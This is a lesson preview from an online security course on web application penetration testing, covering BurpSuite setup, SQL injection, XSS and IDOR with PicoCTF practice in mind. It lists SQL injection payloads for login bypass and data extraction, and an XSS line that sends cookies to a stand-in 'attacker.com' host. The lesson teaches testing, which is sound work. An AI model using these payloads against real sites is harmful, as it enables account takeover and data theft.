█
LastWrite
  • > Curriculum
  • > Pricing
  • > For Educators
  • > About
  • > Contact
Log InGet Started

Questions, concerns, bug reports, or suggestions? We read every message, write to us at [email protected].

More ways to reach us →
LastWrite

Structured computer science lessons for aspiring developers and security professionals.

[email protected]

(201) 785-7951

Mon–Fri, 9 AM–5 PM EST

Learn

  • Curriculum
  • Pricing

Company

  • About
  • For Educators & Schools
  • Contact Us

Legal

  • Terms of Service
  • Privacy Policy
© 2026 LastWrite. All rights reserved.
Curriculum/Cybersecurity/Penetration Testing/Web Application Penetration Testing
60 minIntermediate

Web Application Penetration Testing

After this lesson, you will be able to: Test web applications with BurpSuite for SQLi, XSS, IDOR.

Web is where most modern attacks happen. BurpSuite is the standard interception proxy, letting you modify every request in flight. This lesson gets you SQLi-ing PicoCTF challenges through Burp.

Prerequisites:Exploitation Basics

BurpSuite anatomy

Proxy, intercepts every browser request. Repeater, replay/modify a single request. Intruder, automate parameter fuzzing. Decoder, encode/decode base64, URL, hex.

Setting up Burp

  1. 1

    1. Download Burp Community.

  2. 2

    2. Configure browser proxy → 127.0.0.1:8080.

  3. 3

    3. Install Burp's CA cert in browser (for HTTPS interception).

  4. 4

    4. Browse target → see every request in Proxy → HTTP history.

  5. 5

    5. Right-click → Send to Repeater for manual testing.

SQLi payloads to try

Send each via Repeater, watch the response:

tsx
# Authentication bypass
username=admin' --
username=admin' OR '1'='1' --
# UNION-based extraction (after finding column count)
id=1 UNION SELECT 1,2,3,database()--
id=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
# Time-based blind
id=1 AND SLEEP(5)--

💡 XSS in 30 seconds

If `<script>alert(1)</script>` in any input field results in an alert box loading, you have XSS. Real impact: cookie theft via `<script>fetch('attacker.com?c='+document.cookie)</script>`.

IDOR (Insecure Direct Object Reference)

Change `/orders/123` to `/orders/124`, do you see another user's order? That's IDOR. One of the most common bugs in real apps because it's invisible to scanners.

Sign in and purchase access to unlock this lesson.

Sign in to purchase
←Exploitation Basics
Back to Penetration Testing
Post-Exploitation and Reporting→